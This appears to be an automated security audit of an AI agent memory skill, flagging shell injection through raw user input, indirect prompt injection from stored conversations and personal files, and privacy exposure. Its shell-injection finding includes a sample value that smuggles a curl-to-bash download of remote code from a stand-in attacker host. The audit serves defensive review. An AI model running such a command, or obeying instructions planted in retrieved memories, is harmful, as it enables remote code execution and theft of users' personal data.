memory-management
Fail
Audited by Gen Agent Trust Hub on Feb 15, 2026
Risk Level: HIGH
COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructions direct the agent to pass raw user input into shell commands using the Bash tool (e.g., alma memory add "<content>", alma memory grep <keyword>). This is a classic shell injection vulnerability, where a user could provide a string like "; curl attacker.com/exploit | bash; #" to execute arbitrary code.
- [PROMPT_INJECTION] (HIGH): Category 8 (Indirect Prompt Injection). The skill is designed to ingest and search untrusted data (past conversations, group chat logs, and personal facts).
  - Ingestion points: Data is read from the threads/ directory, ~/.config/alma/groups/, and ~/.config/alma/people/ via the alma memory search, alma memory grep, and alma group history commands.
  - Boundary markers: There are no instructions for sanitizing content or using delimiters to isolate retrieved memories from the agent's current task instructions.
  - Capability inventory: The agent has access to the Bash, Read, and Write tools, providing a powerful execution environment.
  - Sanitization: No sanitization or validation of the retrieved memory content is mentioned before it is processed or used to influence future agent decisions.
- [DATA_EXFILTRATION] (MEDIUM): The skill explicitly targets sensitive user data, including personal profiles and chat history stored in ~/.config/alma/. While no active exfiltration script is present, the combination of Bash access and access to highly personal information represents a significant privacy risk.
Recommendations
- AI detected serious security threats
Audit Metadata